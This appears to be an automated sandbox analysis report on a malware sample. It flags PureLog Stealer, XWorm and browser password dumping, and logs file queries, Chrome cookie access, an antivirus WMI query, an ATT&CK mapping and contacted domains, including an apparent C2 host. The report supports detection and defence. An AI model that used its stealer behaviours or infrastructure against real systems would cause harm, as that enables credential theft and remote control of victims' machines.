                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dll VolumeInformation
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\WidevineCdm\manifest.json VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\Trust Protection Lists\manifest.json VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\MEIPreload\preloaded_data.pb VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeQueries volume information: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\SCT Auditing Pending Reports VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\WinUpdate.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0040734D KiUserCallbackDispatcher,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetUserNameW,8_2_0040734D
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00425D57 LoadLibraryW,GetProcAddress,GetVersionExW,8_2_00425D57
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected BrowserPasswordDump
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2511613578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.2489538224.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053863237.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected XWorm
                  Source: Yara matchFile source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7180, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected BrowserPasswordDump
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.7760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2511613578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.2489538224.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053863237.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected XWorm
                  Source: Yara matchFile source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7180, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  Account Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  Scheduled Task/Job                  		1
                  Access Token Manipulation                  		11
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		3
                  File and Directory Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		121
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		31
                  Obfuscated Files or Information                  		Security Account Manager36
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Input Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		Login Hook1
                  Scheduled Task/Job                  		2
                  Software Packing                  		NTDS1
                  Query Registry                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script121
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		LSA Secrets321
                  Security Software Discovery                  		SSHKeylogging114
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Masquerading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry                  		DCSync141
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                  Process Injection                  		Network Sniffing1
                  Remote System Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1406161 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 10/03/2024 Architecture: WINDOWS Score: 98 103 title-formula.at.ply.gg 2->103 105 msftstore.s.llnwi.net 2->105 107 botmaster.mediaplus.me 2->107 123 Snort IDS alert for network traffic 2->123 125 Found malware configuration 2->125 127 Malicious sample detected (through community Yara rule) 2->127 129 14 other signatures 2->129 10 SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe 1 7 2->10         started        14 WinUpdate.exe 2->14         started        16 XClient.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 dnsIp5 93 C:\Users\user\AppData\Local\WinUpdate.exe, PE32 10->93 dropped 95 C:\Users\user\...\Botmaster 5.8 direct.exe, PE32 10->95 dropped 149 Creates multiple autostart registry keys 10->149 151 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->151 153 Writes to foreign memory regions 10->153 159 2 other signatures 10->159 21 aspnet_compiler.exe 2 8 10->21         started        26 Botmaster 5.8 direct.exe 6 75 10->26         started        28 cmd.exe 1 10->28         started        155 Multi AV Scanner detection for dropped file 14->155 157 